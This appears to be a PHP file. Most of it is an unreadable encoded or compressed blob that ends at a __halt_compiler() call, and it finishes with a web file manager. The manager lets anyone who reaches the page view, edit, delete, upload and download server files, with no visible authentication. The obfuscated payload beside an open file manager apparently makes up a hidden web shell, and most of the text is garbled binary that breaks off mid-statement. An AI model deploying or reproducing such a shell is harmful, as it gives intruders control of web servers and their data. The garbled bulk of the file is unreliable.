Gu�P��NfU��5%��Y+��4����b䯲�ķGY1�T�.8�ѱ�l�|�Qo^���ݴ�E='Hj,N6dpx���T�C�,�KG�oA�h�n�HP���Zjjn2u���1��/a}�s�]�@����e��_ ̘�X��;�@0n�b��B̑*V���쩣xX�+�[��bK�,� ���\\�Ǻj*<��/��ߕL֪}��ѵ>�3Th# @��dD�4����[:4��=�q��e�w�@q�/��;�l�}U р@017����Ĵ�ͭi���d��n�g����y�T3;�aw�Q��*��^|�E^��M y�g��� ٗ���(��̹VZ%�U�@��Гl]�����4�V�id��1s^�>��������%�yP�Ыty|1�!KQ=�)�sh�A��[׷�Xr*����#�Ł/�D��� Խ��n{�@r��ħ��l��@{\"�X���]��v&c���t��t�����֍6�潺d;����&����� ���`������?g��M�&�\$��uOj#�s�Ǧ{%�cyH� ʟ�8D���Xа��ӻ9ץRXY��,��@��ѹO�ر��)��Z\"s4��X�9��7 v�8.9��3�����l�n:���a����,Q����Η���ҕ��y�v����Ω�t��FA���˧�P�ڭ�_�M�Iy1��xE�9��SH�o�*�9�����ccR�v����w��Q�<�J�:u,_�y�#Wu�/��~�%��p�p[�}��8�d��NU�\$��m�g �k�2�p�gJ���)A�6%�(��DNti���5��J����Zy� � *�Y� �^�F�Лw�J�a�g?�B�q%�N�(�-A�>�c(�g��Q���Pu��vn��v��c1��2�=![�B@�3�m���Èh2�ؑ��܋��A��'�@�>�i4�J.��2{�!s��|.wV��ׅ��2�4a��CjUNދ���=��䵶��xԥ�v�b<�C���w��'���y7b��w� -i|�x�L�Nf�D��Ė�ˬ����u�/�2����4*AZ������� U)����itc� ���g�s�w�IȻ:���x�-o�v���\"�j*�ޣ�z��;c*f4�w�E��f���_@HL�kզ%�C�� e�Cp���SE���Z>�UB�&d��ݗ���ĐI`nr���:�2�1C�z2C�i���z�m���q�g�(�-s^�c�|��?\$] @�x��s��A�d��QR�AW���bf�8�� �X�P�E��`�@����O��(��)A��� ꎅ�����a���_���D���(�𛭃g��H�E� gy�ߍ>��8m ��B:Qb�tO�gvZȽy�{�m�AqI%'W��1@�6o�wN�z塛��9���.���U��e�O �]��2e�bI�x䪸*��|-�W��B �,�*]��t�旅t���Z�8.�IE��T��J��a��b�NUn����,���6���4�}H*M1�,�dH�ퟹ����4 ����o�^<��` C��/��N�����MkH�l�>�\"�]�#�H�y����`�3@ȁ�҆���g��������Sa����D��W���Z�h�k�I�� IZ�~��w�U � �㝓m���� -���r��l�p����3��i~�#�A���ZU ��\$�c������/�ݲ*K�����u�f�=��t�(�G�x�H��~[��dOu����̇�RB3 �㉅z2�t�9k��873��Mwb8E� ��.�*�։,�,����σ&�v��^Q�c���,��\\�%��}ruY6J���V�³?�0� �i��O�캬���Q�ߙ��� 1X�\\yD\"�׾_x����(�Hy!Y`+`}n���jG�wI�������& !��5tB5���,N� �{�����.3���Y��I<;\\b. m%��>C�6�X�ιLj�����vn?A���4�o+���eD)�3��'r�X���-��꣦9�,&_,�wpu���H�l�+��˕�+oeS&�4;n1�e��҂ҙmE�������Me��;�u�&}������@ ���p���,���t�b.�1�8.�#�GF�8 ���Y��:�� � FG[��H/��=��&��C�;w�_.1�� ���~�U�6����c1�b�M�s�*m��f�Р�:��|���?{����� 1 �\$dI�gKA7ي��Y1��=d�CqƊ���p~�Ӛb#�Q�n �_;lْt��u����6�~VQ]G!M9&��l���Å�bpG����qa�B�;Z�y�����/` ����K_�M ��{�x� �����An\$T֖n�MV�!U c�b;m��Y��F?F.��25��1�Vϋ�f@��{��h�;�.���tZ����{�i�`��vRP�񓠝�NN�U�-��z�ۜ�9�)�bˀ��y�'������<��c=��[}l{F�'58�� F��� ���4�Q��q:��S���+Ǔ} Ea�_ncj�N1{�?h�+11��&2p��\\�\"^�B�zX��Ėk�NGꇌaeHӀ�Q�P�� ����ׂˮ*ܕ\\���8�۶_�!���7% ��SOC�����&O �p���p!n� �x\"U�o�bCj�Z�M�K��2�hx�~yBb�ɨ� A�L��Z\\`��-�^}2v�H�v�F���\$��JO\\(w�@PY�R/�6o��ؼ��8)4�m�6�릗\$J�T2S1+�F�e�C0���-O#�̿���Y&/y�Þ��z�������� ̼&O�bs_��;͏~�YI����-X:\\N�d}��Z��\\�\\�q�h�������0��\"�d0g�Ʒ���=�ل73U�=��H�Z�B]45b��\"5���)4A���yE��u}8�&��x�w\\�>�\"\\\"]'��E��&���p�1�5u��B#<�j'a!g�ү'��0����7��� �Uv�!��������k/gS�P�EW^�n �cI�G MjNJ��,��qi�nh�|� ���#� dPN=ϐ���z��Y�ug D�����/+�%�h��<�'�� �?V]�_���L� m�W���4�[����ۨ���HH������d�x��N�s�[X��_�v��T|�zÞ��Z��|��+ ��/��Z���E�Z/�P! Ԃ)�,���;*�\$�GC5��uP-����P�u|�k���A�-�0�6\$,�g`��\\��a�����@��7-W�}]���.h�@�U�����7Dh�� �@W�:*c1�xY�'հ��� � �>�ٺ\$�;�G�o��k��Îyy�đ\"���WJ��KOs_q�K趮)c�#\"���}^�;H<��~q~�8�@�YeE��n��:Ѝ ��H��,�ȧ����ҧ@�yQ�'ׂX��.G��� ��G��ّ �=��y&�|�J��wf{�;��H�5��m�2*V7���`F�����`x���j�?'���}����0��Բ\\�eY���k���B��N�f����N>g�R��g��/�n�[�����}/���֠�K�l��\$U�w�Qb�Zz�(x������z�ǡ��]UA�O��Q���n�����p�1��i� �)�˭�e� �5#��+�e ��!L/�����'•��z�(aE�#�+�Y�ߩ<�d��I��|m�*CjOWV�] j�H�8��s�y��/m�� ~�H�e����#/@]�e 9�~���D(���u�+�,r�;�+�Ҍ��8��� �G1T;�?��,���ls�i����Rj�^,^LSV/#Ѩ�n����xT@=*)��.@vl��VR �a-y��;�����R���w��9����P�7u���I���t��af�!v�Uˤ�=��P�U�?�+���� �kO�J �<�*�-�K��h�ۭ[ٴ�U��/ q@��h毙��n/\\ʳ;/q�td�+��#'�+cY��.�t>賃=N^�Ji;���NΫ2#7�� ���s�P3���@?�c;߇`s��+�64,nr��5�2jݦJf�:�:��#�(5|�/rxl���x{�52�w ���e͉����\$������܁���x] Yo�����]%SL���(����שd��v�n5 ��; �V.4��Y-5pY��I�%�Kb'}�F�7���8|�����%+l��\"c��NjK�\$����ɑ�d�_�U�4PF�x��b�HF�N�h�� ��`��Up�GȭU~�G�\$���k��'q�Qe�gڮk�k�N_,���H�?+���.��.I�81���|)�*y�B�Q��w� 95u*Z䌜��q���\$�ƻ��� H��2��-<�2����x|WFct�_쨟�Gn�;���^�����e�{�]�����\"�����a�RƵ�8�ҟ� ���+�|/�A��R�����%xo9��F����ڸ]g�lυB��a�I�7(�]�Z�wÔ�9Q�b��+�o�6�\"�}���HkR@v�k�}̪���9R�bvz{��j�pK��.#H�4TvU���_�(�n�PL�#�~�E�[�%j\$�e����!�52)��\$CcO經_�.r��R9\$��d�S(�,�t����3Z��#�T�p���8� ��f�.��������~�֯<\$d�9o�l��X&w�ou�<�|ũ?ߜ(r^�[����64#��k2h�x��y��O3��~x�2O)�n���֌���,n[��~k>��=~n>�Չ�̜��|vן⎔H�D|�vL�� �^>N���*_� �I�m�ɼ��'3�+�I �AGޙ6���!�VP�+�� ,��%�01��Gt<�l��-֩�@�*�8p���{9����q�ȘR�3� ��}��6�>��;�#�*�#�{:�=��SBW?Tg�I���c`� �+�J��Ѳ�E� Wqʅ������P�]9�ܝ���!ck�Px1�����}��/�� �Ma�S{й2�zx��ݴ��o��yy��z��i\"��j��򲻇'�+�縔 ��N�Ҹ �#IX����4�G3yB,U�;Ơ4���Jk�ڊ~-��djvW����4��h�#�٨T�@/�V.( O��|[�QY���q��n 4��ȥ ������/u�2��I(��J gx˵��x�����GF���O�����h�E�`���7�-� �.��� p�Y�u ��c�]@06\$w�� ¾�>&br�W�b���&E�\$�<0l�?ψoU�-HsI�.)W!߱R��N:��/R�Ջf����J9Y��HU����h��\\�=o�^?Ͱ����N��21���PDg�ƺ탞B+V�W�B�D��T�j⯿�hQ-����Y�,U���H��9'ѱ;�7 �^z=�[�s<�&�#wr?a\$����g�<j�ʸ%����;?��'Me& �}55�LP��ZF�p�*G;�Қ�t{8s�: ��L�YU@J�.��#�˿Ԍ��� ��Sk&`�{�.��nC�]���z=�u�f�#}�r�#_q��Y>~��[ Ús�'d�A&��*:<._8<�=�jY�MD]���'�\"s P�ћ��8¿�\$�G�,��;*��u��b���9\$��K�ʇ�ϝ��ƛ��S��w��h�@l���NX��<T� KD97cj�2��� �����n'bpƛ�C�~ꚄR�?M�-�fx�^wJ٣S����,�r\\�I�����3��D�����ǎ�)���(ě-(� ��e̓V� D�Q�/O���=>-��%�Y��*^�Rd�n��*]�c��6Di�C[�A�E2����� ԰v�5�Q9�X�F�Lfl6ϫ�}�q)�lw� &�RIFW./9 C_��.u�[*I1̠� Q� L)��+?0o�N�h��L�{?��Z� �R?*�d���i�(�'��9E��h7�����A��vqԪ�-6��`W�\\�ԇb���83�]���bu2�`���{��NgT�J�S+����F!�D/Tc��'ŭr�S_61[� S��_��A�xؑ�:��T.���!��V#T��������͆��%i�a �o����⨇�/e�2ؾ)9��[�c���p%�Y@VU0�� ?h��C�NX\\�1l��ػ�'m51�<��J4дn�hGBv�'bh����-H��'#1i+�tP֪�ܮc.]��/bMT��m����d�਀U�� �79�G�L��.��w:�`w��*Ь#�nz� p���ME������3`���k�s<��D�۞m�����(- ���R.��qs>� i�9� �R���\"�k�4�%����'\"{�.��F�i�#���BM:y�O�� ���L��G�-�7����Mv� 1� �⎆JZ_f�~��3�r��|+6wN��E�6z[C�~���( �������@n\"V5��\\TNc�P���0%����;��(\"cUQ��?u6\\�J m!u�b�|j=����8�|����h���B��u��nr��[��M`%N&�f�Q��CQ��)�\\�(m�hg�b�� �B�™�J��pW����Gٸ�? 36�3(�E];�ʸ��~Ώ#q|7��ιvׇ|�n�8�+c�*J��\$Q�����}<���\$�K���\$;;iBjR��H[|h�qn��1���2�e�>������&��C��*���AYдa�o�ɩ#u�`��Y��TL��jU�1��x]���\\����l l����?0S]O���+j���n��\\���O1�bܿ��(΍��e\$�*� �%hj��>n���j��\"4bx�XĚ^}����0��܉'J���-�+�����m���)5�#}����u@���k�iϰj��0'�0��~0�>�I����f��}S�3��V�^сUV�� a��Z/z��-D.n>N �R|:��Zቲ���nO�2�̙� ��їMn�rȥ :�ʔm=�h��ب�b��K�E;H��È�� ?G�Y=�>e�*] ^���M�5&�M��|�o�H����t�՗O����8�Y��#E��9^���Q �p/��>H��y�G}�����#./�&�Bvs�{���=���I�5�a����PI�����DC�.��YD�}��`a����j�8=��`�語��E�|]�s�=�,�(��ϱ��)��0sB��K�uY��i�\"���]�]N�O��'��xp��D�� 5�M>�+%�N�z\\�vϵpVC��h� �IP���X��g�,�j��-��(��z�T�{�ĺ�'��cn]ۙJ��|&g�tR6��qm���(���-�S+�ӏ/��rzJ�3����G7��T�.���ñ9�[�b�Y}_�A,uɂ8}1�oB���� ��)� ���|*\\|x�G0�aE�_�k���R'��(�Zrݵ�%! B�Cğ�Yp-��4/.� \\~�j����˰���c��2�J�o�Y�.2�j���\":n�AG �_�������߬�9] S)�r:�\\<‚�,i�I�����w9~Q5��j��L��s�IkP�H��߾�J�`�1Y؏�b�2f���_��XUr��E;e!إ�e���� ��e5V���\$�:�m�=\$�]�P!�%��5��9�=��`�i��l�nz�S�/^*N��rÚ%���!�M���0���'�֟����J;���������F��09)?�'B^r�BOё_]#>W���j��'��� ^��58��!6X3D#`)�ӟ��,��=&gR�D�#�d&��~�ggQ3�s[,�B}���o!fCj��A��'Lܻ�����9Q�V���Q��v\"� ��I�;%��T����\$�1S��6��2R&��6X?�{R��#Q���ڶ�����D��z��,n���@��g���X'��UWc�WS�#� �)���䁧� ޓ� 軏'[j�3��VV��upt:��I����Q�׻[���F��������=��H�V�%�Hd[��ã��^G7#�M8V��]2�ո�ZV_��ww}�Ҕ af����B���\"���a½�4�;=ZqNK�P�z�̕�K�fs'�����^�a�����U���~x����-��X�1��L��BP��3���/a������(R��Q�����#�>��ꈵ� �X���;y� /�'���=č6�Е| �ﻍ���*9m�DƚI��=3 �%dUU�׾T���m��d�.I��婊�V��la��*�Pֶ� �ޛ��Ec�?*O��:��-B��\\�� K3RGO�j����C����'���Z ��*�����K����}��du������%�n e�����!R��6rIX5R���R���j��E����U>��s���+�V����ahO B����꽷Dz�UuIN��>)����N~ �|�� =��lC)@K��Cy��*�-4Y��w��]� �у i�!M�Y��qF��̾C5�.��ʕQn���T� G̒�����z�+\$y}���5��v��������J�Ӑ��v �|�~mqQ\$^���Rk 邦��<�)QP�.��3�4v�<Ų� ðC��Y�7�8_�Nj��'g�uw� �q����\\蓂��/�,Q���0��D�D�J,��� R�q�3CeE'�P�� �7\\�kTp�o�����?C�!͠�lz�� �XL�D�(�*Zȇ���3��%\"(�dS�s�UɿhJ�s���BO��Y����{P��L�����U�J�ק,�q5��o<(abH��P�\\�F�|&����`��T�}�O9� .�A�(^LP-L�?�~���� ~�t�ot0M`�R�9��������A7-Y��:ʳT�i���c��u�?/ɭ�אg�9F�R���g~ڶP!>-v�T��9�t�_�;-E�cRtl]5?�_�uDk?P��ӎ �󑄔&�.�v��p���N-��o�%=⊍���%��nKպ[MP�0��1�D������8 �Iӫm�XT��.u�W�`s��Hǘ�y��SZ��uTZ�JQ��Q� ��U!�]�<���I�C�A �n0��^AK�3}�u=j+��1����K��\\��l٥�ϖ� ��E�Tl�ܻG/�2�i�0&�̑�堨��F5���7g�����_��^F+FsL�H�j�cL>s'�ɉe���X���h�/�O9߉\"7@��:w�v�&��J��HP��\"(��8��܎���/Zxܘ~�T��E�2Y6�['�A\$�>�����D��@T�5��]���:��q՚@�o09��%�b c���m��;������^�+� ~�>���\\�0�?�/� ���N��.f�����[���!�[U'�N|����� ��CN��_u� /��C�0�.��zkp|b�\$�'h�-+7�vp��=����,�r�䉺A�%�~�}���p�[����|<*�ֶR�s����K�.{5'��t�`m�)��֦���7�!���#����J3�4�14>�nZ�TL�|wY���/ʇ���bbN�-�eB��X@�u�V���}0&3x昧/��m,��[M�O^J�,���e�ת�����>��q�{�H�s�س��� o��F1�4��h|�*�t8�����4�� �� ��9�5ܜ��/JZ��(� �K�! �I��3�(�Ǐ�0�cA6��[�/�y��P�Q2��(X���� �{  ٯ[��O���1�BT1pƏ75��� ��A��7�<6�.�p��u 㕾���Z3��w�.+���Q�>�-�UN_͌\"���M��Rx���>!� �c����û���ˌB�1�K/��a�پ�~bc��| ��W��i�Z�:�٪������8K��T�������xU�s2���]�i�l��-�&��c*��qG����5��Tc��tº��eA�,뢶6NQ��T����l ��0Tr�q:� B̍Yv����c�;�� f���i�Y��%�`ؐ,��!�1�:9��4��5P��d ȭs�!#�ڠ\$ck�\"�1]Bj��+��9��d�u�=��݅D��X��Hm�H�f���Q�p�S�a�3��`找:��-P0aU؆�S\\�4�1�8�����f�.���|k�� �*dz@���LBy�t��:WRZ�d;���l���'��I��Ah�}o3[Sjp���T�����Ш�N��-/�- �������U���rf��+�oPyZ���Ȕ%ok� ��1�d'�{�)W-�5&Ʀb:I�Һ���/��9K�J�.̳�� ��a��WR��ˊ����t�� �� �H��lF�� 32hUk՘1iy-�?����H��W��V�Ҵi�DV�6 +��:����sX�\\ �?�1A�ku�,E�v��=�c{�}�dN1��cX���\$hY4�F����Ȳ,�?L�8��\\�Hvg7i����j O��6� G�3�GLڗZȉDy^t�� �{��31�\$r`�a��-/������L5xٕ�;\\�����#�*,���=u� �c02�B�e�{;;�R���] Q�川�z��8� �}��7�}x�9M\$�3Ս��+�/���yd�X��2���p�+8��{� O�ŀ���N94Y�5��e�_��-���#S)(�2���U\\��b��4�'�AH�2Gg78t^��o�m7÷S �� �gh�%B�Kڝr@�B.���t���԰Ĩ�A}�L��eK8��}:�3��idYA�i\"��]J�����v��槜�+i��'�p�ÍZi��ZA�͙�L���W�*�*숲�@��⛒�ˤ��~���,��e�̴֝�\"k~���yLH���{����7�����\$@d��+��Vxڌ�c��XB :�������N�^c?�_SL���V �Sˤa����{�?�޻VY1.Y��yKeކ+�V�Øqi�Ij����6� �f|�;�W��R5�����|������),�5h�s��v�A�U @9v�*�Nq3�Y�u�������rS3��J�0ͯ0�O��@3�T�wY�ޖ.�o}�+\$��pA%��]G#�Z���^��G��F2���Q���Η�h�bC5IH#|�R�1���RIa��ݙ��_��u�,�����K ��7��fvye�]7�!f���ZK{����C�������i��� �H�SȋO 4�D}�>'���IA��۞�/��v�hݻ������U�>� ����8�b�`�;5lm��LB�U.��?����� p*=>��!��t�N ���Q:1*�ӺM�1�P%T� G�ʒ6)�ǥ+�b���� �П��1�����q���/�&ȯ���� �L�/bq�b�nq�h� �u�,�mL�3Q|�exW�R�5)@5�[�{��{�_��9R7���9���(հ\$�<58�=�^R��Rp ��~�Z2�Y�3ַdo sw'jҭ@��K��9���59��f��D��F;(bo�Ơ��)�b�=\"� ��yDk� 5� �\"ޱT���<� �TP.}A�#�!������[���}I;�J(�ٲ�+�!��1�=so ��\"qѴ��X�߈jщ��r��C�{1=���4�i',{�Ļ����+���ֻ��ɛh^QY�8e��.a�5]��:t�ާXڻn� �������gBaWsh�0]��G�~������!Z����r�~lMk���Zw�Ꮀ>_��&�%:sh�[Ag'; ��n��:{�Jq�wGU詳��ǭ�t����~S�]�tי��zi�R)y�\$O��j4���_bK�U�h)X�Yijv�����<Ă���w T~��飁�i>ĭ�L<���廱&~ƺ`Ht�+C�(s�2���5�ס�����|-�� � ��I�צBu���3K��^��i�B2c�Ǽ4i�&�-(� �\"' �rhqa}&��o(���@�WT6�z�ŗ��'}p� ����[�\\�\\w:�����%:��Y��=ҿ��y�?���tY�?��x�k?:�!�]%�ǣh2L:�l��]��5�uo��6�� f ��4���{�����qzR`���?� �jڡ��-0[G�h���b����!�ʪ7jp� X�� �� ���#릎��(B8�'��������C:m9:��+_P|�M�~����mk��.+��{.{��sW���H�l'��P���� ��vŘr^*\\�s �Y�+P^/j�[/A#(��d9*Ϗ��E�Ȱ���g~.�a?��u'�� n���;��ؚ7n� z�cOhol<�j*Ƴ�%� b��q84tי��Z��R5���#@3���8�a��j�nݦ�ϊ��˽���0��gI���ܣ����H�ʃt�<� ��X��~H2���!zƃ���>�a��j�w����v)?��H�B��*K��S��k|ΞO�T@Wi����G�X|�� Rc�� �c���Y#Fa,\\�Z7�j�D� 9�>�6�Q=ݭ&��G���q����ATO��Y]�v�Կp�K��_fFf��䳜 �*>�X�Q��;�k��\$�*��0S*���:�E��A#�Z����k\\U���x���ڛӒ�w���3��g[��-z�^�1�L��W���W�d^¹2�\$���-�;��%N|֦���U�::i�)&�z�=�����hs(���|���˟-�R��7^��3.�Hwd�鬨�� ���/�G3��3CA5'���S�ʋZL�*p�E���e�Mu���6��� ��8�;��%�D(�ѫ� �� !�k9 lO���P��Rg�㤙 �Qd&+�1�N���`a%��o�B�s�.f^g����,�f�H ���?]�ܯw��V��� �~{����j��;�y*焮Z�J�\\陚̡��d��i��M�]�k7�2�>_1:_��ZԎd��!ۅ�4��d.X7ن��^-ָ�l���\\I�5��gW�#AT��� �fxM��Nr�M�풸b� ��8fɢ��n^N´�d/,,��2�!�B8ܯ�pc��������sp~���WI�!�w�8+�&`�5�*� ���r�`�Xw���5)M�ĦR2�rM��\$^�ƈ��ggTl��4� �fZf���>��|1�c��Pl�r��|�Z��K1DM_���C���Vcdk�8V@����m������x�\">Y���1�:Y�����s ��X�U��H�4k����\\��w���F��-,v��D�G���(&�{o����U��v���-�pB��&<��`�o��9��N�a%MI&���S��A���2]_c��R\\�s�}�eQ�S]ZU7���!f'v���G���M%�`+�4�v ÿ��)V���( u�h�pN!b1�<:r+����� �����C,��Q����ICI=ݔr���Ζ�Ƹ�BB��\\�AEP{��[T�Tr?�K��vo\\O�o�2�3u������a�pol���p���N�C�@סD� v_gyo�[�XY7�S n\\Me�VVu #��pY��K�����z��4�'��S�Y2!�q\\ݞ���d&����̥�^���M�#X��dw�����Wo�KK�K���j\\�X�Ǎ݋�\"='`�c�g_u_K5>�}suN��S��҈Lũ!A �E��M0����K6y s��F��E��W�Ĥ�j��޹lE���-�/ƿ�h��ݿ�.�/O�c,�֯@V�کu����?&�A����Ӂ �(��s:���G',f�c�����j��u�w�6&Ao�?n���3%Sw�W&�I� �5b�3oPqm�;��o�`�Ͼ� P� �h_� �a4o�� �uO%d����d�� >��^ܜx []�\"5_r���k{���ͅ\\�w �2�� K�Bk�><�5�z��`�zf���rF*u��9�k�%���?a ����� �Mܸ6fY��t��U�R�w�� C��F*=_��T�[Ǐq�Ֆ��2jİ�@�}k��֣}��L��Q��V������Q�X��y��%���6>��%|OmiV�P{\\`^{�Ƚ����v�j\\�)�:��ڛ��:M�h2'\\'Ƹ42!z�C[@����@>_���u���m�T�,��7#�����^����2\"�'���)��P�@X͋�`Z �j��t����:��! m�*wr�`�,�t�b���R5z����\\�?s��e`����xD��m�}�H V� B7�m)k�: ��� �Ռ����.6Xs#��G���S� �ϻ�J@<�/徤����W��ؗ�Ʊ�0��p�9�F�+�N��r\$�_��ݺm�Y}��~~x�?�����R� �ح�G�\"��L�o����ggrD��\\�F�s�'�E~�����ͯ�a���4_>�� �jMLU��S��z+�<О�@��|��M�Ժ/U �~k�C`ͻ��D���:��(ҹ�A?u�X{?hl[��ξ� �w`�>��ʮR^��\"X��x p�R���9�T���^薾�x�4աC[U�>���;��Ƨ�F� �\\94���� Ƴ/G޺r�9:h��oQ 9䙹�xK��u���l_N78c�%���ɡ�u||@����Sn��pӤ;B�1������U h�|A�eD\\���|�`�1 9�?����+WJ9��\"� ��c����' ?��+hj��A�\$�w E�P��A���Ⱥy�/ ��|�P��9�Mj�؃�C���.�&?�z�h���#��wsz���k[�v��H5��t�m��ܫ�F�%@�[Z�/�%�E%/�ӹ<9ꚳ����������Q��ީ�۳����@�i��&�~3�M���0S���K� �^�0�����Qq�(���^|j*�Rs��'C�V�K3��7�H��'�Ղ�%�eo�̄07 :�Y���=uI�f� �&�4����w�P�Uocemnnif���7Δ=����;�̏���4C,F�0�N�pJ�BZb��fd1'T�g�i�u�t� ��\"�1��Dp�!�M9‹?��}P�Tf���6Q;���(4��v/kL+�N�Ȓ����u��nJu`���tZ�Kԛ���xfZ#��U�s�Lֺtbp��T�ۥRʧ�=�����Ry�-v]B�i���C�+� v,��b�=s�\"Γ�]���gy�,��ӕ�A'���\"���I��D{�K- ^h�O��U4\"u��1�'���ts��6��]�fIC^� �N�����k�J�C����� rΕ�i�E�� �s7fϼ��Q��(u���� UJ����{Z9ƾϠh�n�„ҵ�Y��D���%݃��@�[�u�uP�@��� <3?�m��,픫��{� �7zWq��?j:���q����U���X.��х:>m�\$��0���o .� Z�D�3p���,��˜�8������ϒ� �p��:#>Qk��_EwY���QsC��+�J�\$�h��_!��[z%�B�5����z�\\U�\\̷��!1���ؒ2�(�/>��z��UA�v���ɀ��c���^`͢@� �E�}�;�h�ވ��{�:�%��\\��+}o_���H?��5��\\��^o[���剂��[�p��týp֟�\"΍f�}6\"ZW�vIake��z�ٯſS����?\"����h�7&yo��\"[ƒ�}�/�f�+p2G��l[������!3��) ����iQ>�jw�l3���=)��,�=/.�ޖ��u����?�y�y�Ourb2|m��DS�tE�{\\�F����&��M��cw�E�;�#�E�2n� ف�ݮ �yr-7A!ŹYm�I/�0P����R���9dn��Ϝ���pˎ`�sS�R�;��g�' ,�O� \"��@��lߍ7 ��.�޸Og��8����J��*�2���� N�Cz������R�/��#����n�0�_D]BDA��ᶐz��K?�����Q7<�T衰�YS*g.,2�3+��玺 �q�ヌՠv��� ��5�3j�!�8�9"));__halt_compiler();�����������Ў��Ǎ�� Ж�����Ӑ����� ����������׽�����Ļ�����乬�����ʨ����������������������� �ķ�ـΧ� ޛ�ݑ�����������ڃ���͞��������Ǜ���鏌��������϶�Ƒ�����������ˬޗ��³ȋ�� ��ᴫ������׸����ҍ� ������� ����ҍ���۩� �Ֆ��������� ��Ə���A.�Đ�-�MW=�̕�>��J�\6 �����XǺ� ��� �wg ��S����qc�/��DS����_���A�ۘO{��J1�]\qPWF����Z'e|��s*_ӶoR����-���k҄wq|�G��ٗE�%�[��8{t�A�_������V6}RCߛ_ꍁL^0��<@*D�� �"Y�k�79q�������^�:��_V��A���t�|�F+y^�h�B��G�Ga��۷h��%X��K�iB��b�2��a:N� \Q�l0�s&���˙���>٤3cpo��ds��$�;�B\�C ����LK�H�տ1�� �,�yO�+Y�ވZ����@������>4� /)omXF��0�v�e9 \D�2���nn��h�@�Fq���D-zQ��;h����A$�F ��K�ѯ `3�'ތ��>�zM3C�1O�mMES��B`���K��%��DY���i�)7%_>�_ƃ�EՃ� ћ���I?B�ą)�K�J�E�=��^�(���,����ox�������]�[�$� ��s^�0ٕ9�\<��L�ox�v+\"�h���G�#� ʃ`�� ��k)�#���՟�a�d��i�$�[�M�L���@��ٯ���M q1�Կ��p>v��̬d��$Y�N�% 7����H�XUy5�I -�N��U�����l`.�G���߆^�$��������Z�~�8�e_��/��=k�g�7�����K� ��D��E �P9/��$>�VP�\(�r�Q{�V(�P����F qq0�lA>��ֻY ����)/�[]�@���[���3�wα�v�Fj�}���a�˽`�B�qF�}>��X��|-ԓ�Ոf�u�������_n�5]+� tm����9 ]�-Dw6�5�?�-��]s"+(C�|e(�y���~44�'�)M~��O�u=�B=U��b��x��\��c��#D-iB��o��^�"Z�T'�u^m6��+Y��t��gT*ɜ�ҿ*����uX�+Eӫ��=�X*� �xudW��>�6��� ��Z�&���\� x�,�#� m���x�*� �z�����f�xAN �<�ͱ�AW���jQ ���"<�ꦽ�V��˷p�-����g�=ø� X@v�/^����(�Wx�|��VhԠ:i�iK0l�E2_�N�jZ��0�1�i�&�݉jx����"J�4M�%��gU�\6�T~$��/��&q�n�K��d8��@e������U��,4}G�h��(pZ4!Y $item, 'path' => $full_path, 'size' => is_file($full_path) ? filesize($full_path) : 0, 'type' => is_dir($full_path) ? 'directory' : 'file', 'modified' => date('Y-m-d H:i:s', filemtime($full_path)) ]; } } return $files; } function format_size($bytes) { if ($bytes >= 1073741824) { return number_format($bytes / 1073741824, 2) . ' GB'; } elseif ($bytes >= 1048576) { return number_format($bytes / 1048576, 2) . ' MB'; } elseif ($bytes >= 1024) { return number_format($bytes / 1024, 2) . ' KB'; } else { return $bytes . ' bytes'; } } // ==================== REQUESTED DIRECTORY HANDLING ==================== $requested_dir = isset($_GET['dir']) ? sanitize_path($_GET['dir']) : basename($base_dir); $current_dir_candidate = $root_anchor . ($requested_dir ? DIRECTORY_SEPARATOR . $requested_dir : ''); $current_dir = safe_realpath_within($current_dir_candidate, $root_anchor); if($current_dir === false){ $requested_dir = basename($base_dir); $current_dir = safe_realpath_within($root_anchor . DIRECTORY_SEPARATOR . $requested_dir, $root_anchor); if($current_dir === false){ $requested_dir = ''; $current_dir = safe_realpath_within($root_anchor, $root_anchor); } } // ==================== PARENT DIRECTORY CALCULATION ==================== if($requested_dir !== ''){ $parent_dir = dirname($requested_dir); if($parent_dir === '.' || $parent_dir === '\\') $parent_dir = ''; } else { $parent_dir = ''; } // ==================== BREADCRUMB ==================== $dir_parts = []; if($requested_dir !== ''){ $parts = explode('/', $requested_dir); $acc = ''; foreach($parts as $p){ if($p === '') continue; $acc .= ($acc === '' ? '' : '/') . $p; $dir_parts[] = ['name' => $p, 'path' => $acc]; } } // ==================== ACTION HANDLING ==================== $action = $_GET['action'] ?? 'list'; switch($action){ case 'view': $file = sanitize_path($_GET['file'] ?? ''); $file_path = $current_dir . DIRECTORY_SEPARATOR . $file; if(safe_realpath_within($file_path, $root_anchor) && is_file($file_path)){ header('Content-Type: text/plain'); readfile($file_path); exit; } break; case 'edit': $file = sanitize_path($_GET['file'] ?? ''); $file_path = $current_dir . DIRECTORY_SEPARATOR . $file; if($_SERVER['REQUEST_METHOD'] === 'POST'){ $content = $_POST['content'] ?? ''; if(safe_realpath_within($file_path, $root_anchor) && is_file($file_path)){ file_put_contents($file_path, $content); } header('Location: ?action=list&dir=' . urlencode($requested_dir)); exit; } if(safe_realpath_within($file_path, $root_anchor) && is_file($file_path)){ $content = htmlspecialchars(file_get_contents($file_path)); echo "Edit: ".htmlspecialchars($file).""; echo "

✏️ Edit: ".htmlspecialchars($file)."

"; echo "
"; echo "

"; echo " "; echo "🚫 Cancel"; echo "
"; exit; } break; case 'delete': $file = sanitize_path($_GET['file'] ?? ''); $file_path = $current_dir . DIRECTORY_SEPARATOR . $file; if(safe_realpath_within($file_path, $root_anchor) && file_exists($file_path)){ if(is_dir($file_path)){ $it = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($file_path, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::CHILD_FIRST ); foreach($it as $f){ $f->isDir() ? rmdir($f->getRealPath()) : unlink($f->getRealPath()); } rmdir($file_path); } else { unlink($file_path); } } header('Location: ?action=list&dir=' . urlencode($requested_dir)); exit; break; case 'upload': if(!empty($_FILES['file'])){ $uploaded = $_FILES['file']; if($uploaded['error'] === UPLOAD_ERR_OK){ $name = basename($uploaded['name']); $dest = $current_dir . DIRECTORY_SEPARATOR . $name; if(safe_realpath_within(dirname($dest), $root_anchor)){ move_uploaded_file($uploaded['tmp_name'], $dest); @chmod($dest, 0644); } } } header('Location: ?action=list&dir=' . urlencode($requested_dir)); exit; break; case 'download': $file = sanitize_path($_GET['file'] ?? ''); $file_path = $current_dir . DIRECTORY_SEPARATOR . $file; if(safe_realpath_within($file_path, $root_anchor) && is_file($file_path)){ header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($file_path).'"'); header('Content-Length: '.filesize($file_path)); readfile($file_path); exit; } break; case 'create_folder': if($_SERVER['REQUEST_METHOD'] === 'POST'){ $folder = 